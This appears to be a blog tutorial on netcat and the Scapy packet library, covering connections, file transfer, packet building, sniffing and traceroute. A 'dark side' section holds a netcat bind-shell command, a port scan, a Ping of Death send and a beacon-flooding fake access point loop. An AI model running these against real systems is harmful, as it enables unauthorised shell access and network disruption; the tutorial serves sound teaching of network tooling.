Packet Manipulation with netcat and scapy

Netcat

This simple utility reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool to use directly or easily drive by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections.

The original Netcat was released by Hobbit in 1995, but it hasn’t been maintained despite its popularity. It can sometimes even be hard to find a copy of the v1.10 source code. The flexibility and usefulness of this tool prompted the Nmap Project to produce Ncat, a modern reimplementation which supports SSL, IPv6, SOCKS and http proxies, connection brokering, and more. Other takes on this classic tool include the amazingly versatile Socat, OpenBSD’s nc, Cryptcat, Netcat6, pnetcat, SBD, and so-called GNU Netcat. Read 11 reviews.

Latest release: version 1.10 on March 20, 1996 (21 years, 2 months ago).

simplest usage

$ nc host port

creates a TCP connection to the given port on the given target host

Example uses — the light side

To make a Chat server

Server

$ nc -l -p 12345

Client

$ nc localhost 12345

-l listen mode

-p port

Using Netcat to transfer files

Client

$ nc -l -p -w 10 12345 > file

Server

$ cat article | nc -w 1 localhost 12345

-w time out(s)

Example uses — the dark side

port scanning

$ nc -v -w 1 -z www.google.com 80–82

-z makes nc not to receive any data from the server,

remote shell

$ nc -lp 5000 -e /bin/bash

-e program to execute after connection occure

Some of netcat’s major features are

  • Outbound or inbound connections, TCP or UDP, to or from any ports
  • Full DNS forward/reverse checking, with appropriate warnings
  • Ability to use any local source port
  • Ability to use any locally-configured network source address
  • Built-in port-scanning capabilities, with randomizer
  • Built-in loose source-routing capability
  • Can read command line arguments from standard input
  • Slow-send mode, one line every N seconds
  • Hex dump of transmitted and received data
  • Optional ability to let another program service established connections
  • Optional telnet-options responder

What time should i use netcat ?

  • It’s unencrypted -> not secure
  • use for internal company

Scapy

Introduction

Scapy is a Python program that enables the user to send, sniff and dissect and forge network packets. This capability allows construction of tools that can probe, scan or attack networks.

In other words, Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. Scapy can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery. It can replace hping, arpspoof, arp-sk, arping, p0f and even some parts of Nmap, tcpdump, and tshark).

Installation

Scapy v2 > 2.3.3 needs Python 2.7.

“$ pip install scapy” to install scapy

Debian/Ubuntu Just use the standard packages:

$ sudo apt-get install tcpdump graphviz imagemagick python-gnuplot python-cryptography python-pyx

Scapy optionally uses python-cryptography v1.7 or later. It has not been packaged for apt in less recent OS versions (e.g. Debian Jessie). If you need the cryptography-related methods, you may install the library with:

# pip install cryptography

if you need Optional software for special features you can follow this URL 
http://scapy.readthedocs.io/en/latest/installation.html#optional-software-for-special-features

How to use it?
 
Use :

$ sudo scapy

Now, We are ready to manipulate the packet.
 First Step : Build Packet

>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>> a.dst=”www.google.co.th"
>>> a
< IP ttl=10 dst=Net(‘www.google.co.th') |>
>>> a.src = ‘10.2.24.139’
>>> a.src
’10.2.24.139’
>>> del(a.ttl)
>>> a
< IP dst=192.168.1.1 |>
>>> a.ttl
64

Try to use / operator has been used as a composition operator between two layers

>>> IP()
<IP |>
>>> IP()/TCP()
<IP frag=0 proto=tcp |<TCP |>>
>>> Ether()/IP()/TCP()
<Ether type=0x800 |<IP frag=0 proto=tcp |<TCP |>>>
>>> IP()/TCP()/”GET / HTTP/1.0\r\n\r\n”
<IP frag=0 proto=tcp |<TCP |<Raw load=’GET / HTTP/1.0\r\n\r\n’ |>>>
>>> Ether()/IP()/IP()/UDP()
<Ether type=0x800 |<IP frag=0 proto=ipencap |<IP frag=0 proto=udp |<UDP |>>>>
>>> IP(proto=55)/TCP()
<IP frag=0 proto=55 |<TCP |>>

we can dissected the packet with “_” in ()

>>> str(IP())
‘E\x00\x00\x14\x00\x01\x00\x00@\x00|\xe7\x7f\x00\x00\x01\x7f\x00\x00\x01’
>>> IP(_)
<IP version=4L ihl=5L tos=0x0 len=20 id=1 flags= frag=0L ttl=64 proto=hopopt chksum=0x7ce7 src=127.0.0.1 dst=127.0.0.1 |>
>>> a = Ether()/IP(dst=”www.slashdot.org")/TCP()/"GET /index.html HTTP/1.0 \n\n”
>>> hexdump(a)
WARNING: No route found (no default route?)
0000 FF FF FF FF FF FF 00 00 00 00 00 00 08 00 45 00 …………..E.
0010 00 43 00 01 00 00 40 06 ED 61 00 00 00 00 D8 22 .C….@..a…..”
0020 B5 30 00 14 00 50 00 00 00 00 00 00 00 00 50 02 .0…P……..P.
0030 20 00 30 5F 00 00 47 45 54 20 2F 69 6E 64 65 78 .0_..GET /index
0040 2E 68 74 6D 6C 20 48 54 54 50 2F 31 2E 30 20 0A .html HTTP/1.0 .
0050 0A
>>> b=str(a)
WARNING: No route found (no default route?)
>>> b
‘\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x08\x00E\x00\x00C\x00\x01\x00\x00@\x06\xeda\x00\x00\x00\x00\xd8"\xb50\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x000_\x00\x00GET /index.html HTTP/1.0 \n\n’
>>> c=Ether(b)
>>> c
<Ether dst=ff:ff:ff:ff:ff:ff src=00:00:00:00:00:00 type=0x800 |<IP version=4L ihl=5L tos=0x0 len=67 id=1 flags= frag=0L ttl=64 proto=tcp chksum=0xed61 src=0.0.0.0 dst=216.34.181.48 options=[] |<TCP sport=ftp_data dport=http seq=0 ack=0 dataofs=5L reserved=0L flags=S window=8192 chksum=0x305f urgptr=0 options=[] |<Raw load=’GET /index.html HTTP/1.0 \n\n’ |>>>>

we can generate graphical dump in PDF/PS file with pyx
Install pyx : pip install pyx
use this command : >> a[423].pdfdump(layer_shift=1)

http://scapy.readthedocs.io/en/latest/_images/isakmp_dump.png

Send an receive Packet
In scapy, send() function will send packet in layer3 and sendp() will send in layer2

Ex. send(IP(dst=”www.google.com”)/ICMP()) 
/// 
sendp(Ether()/IP(dst=”www.google.com",ttl=(1,4)), iface=”eth1")

sr1() is for sending packets and receiving answers. he packets must be layer 3 packets (IP, ARP, etc.). The function srp() do the same for layer 2 packets (Ethernet, 802.3, etc.).
SYN Scans

sr1(IP(dst=”72.14.207.99")/TCP(dport=80,flags=”S”))
<IP version=4L ihl=5L tos=0x20 len=44 id=33529 flags= frag=0L ttl=244
proto=TCP chksum=0x6a34 src=72.14.207.99 dst=192.168.1.100 options=// |
<TCP sport=www dport=ftp-data seq=2487238601L ack=1 dataofs=6L reserved=0L
flags=SA window=8190 chksum=0xcdc7 urgptr=0 options=[(‘MSS’, 536)] |
<Padding load=’V\xf7' |>>>

Sniffing

We can easily capture some packets or even clone tcpdump

>>> sniff(iface=”eth1", prn=lambda x: x.show())
 — -[ Ethernet ] — -
dst = 00:ae:f3:52:aa:d1
src = 00:02:15:37:a2:44
type = 0x800
 — -[ IP ] — -
 version = 4L
 ihl = 5L
 tos = 0x0
 len = 84
 id = 0
 flags = DF
 frag = 0L
 ttl = 64
 proto = ICMP
 chksum = 0x3831
 src = 192.168.5.21
 dst = 66.35.250.151
 options = ‘’
 — -[ ICMP ] — -
 type = echo-request
 code = 0
 chksum = 0x89d9
 id = 0xc245
 seq = 0x0
 — -[ Raw ] — -
 load = ‘B\xf7i\xa9\x00\x04\x149\x08\t\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\x22#$%&\’()*+,-./01234567'

Routing

scapy has its own routing table, so that you can have your packets routed differently than the system:

Use cmd: Route()

Display result in graphic 
we will need graphviz. By default, ImageMagick is used to display the graph.
Example

>>> res,unans = traceroute([“www.microsoft.com","www.cisco.com","www.yahoo.com","www.wanadoo.fr","www.pacsec.com"],dport=[80,443],maxttl=20,retry=-2)
Received 190 packets, got 190 answers, remaining 10 packets
 193.252.122.103:443 193.252.122.103:80 198.133.219.25:443 198.133.219.25:80 207.46…
1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 192.16…
2 82.251.4.254 82.251.4.254 82.251.4.254 82.251.4.254 82.251…
3 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 213.22…
[…]
>>> res.graph() # piped to ImageMagick’s display program. Image below.
>>> res.graph(type=”ps”,target=”| lp”) # piped to postscript printer
>>> res.graph(target=”> /tmp/graph.svg”) # saved to file
http://scapy.readthedocs.io/en/latest/_images/graph_traceroute.png

A directed graph from all the routes they got, and cluster them by AS.

Classical attacks
Ping of death (Muuahahah):

>>> send( fragment(IP(dst=”10.0.0.5")/ICMP()/(“X”*60000)) )

Wireless frame injection
Provided that your wireless card and driver are correctly configured for frame injection

$ iw dev wlan0 interface add mon0 type monitor
$ ifconfig mon0 up

Now, we can have a kind of Fake Access point

sendp(RadioTap()/Dot11(addr1=”ff:ff:ff:ff:ff:ff”,addr2=”00:01:02:03:04:05",addr3=”00:01:02:03:04:05")/
 Dot11Beacon(cap=”ESS”, timestamp=1)/
 Dot11Elt(ID=”SSID”, info=RandString(RandNum(1,50)))/
 Dot11Elt(ID=”Rates”, info=’\x82\x84\x0b\x16')/
 Dot11Elt(ID=”DSset”, info=”\x03")/
 Dot11Elt(ID=”TIM”, info=”\x00\x01\x00\x00"),
 iface=”mon0", loop=1)

**Depending on the driver**

If we need to send an IP Packet we can specify the destination (dst) and type the packet that we want to send or what protocol we like to use.

Example : send(IP(dst=”www.google.co.th”)/ICMP())

References

One clap, two clap, three clap, forty?

By clapping more or less, you can signal to us which stories really stand out.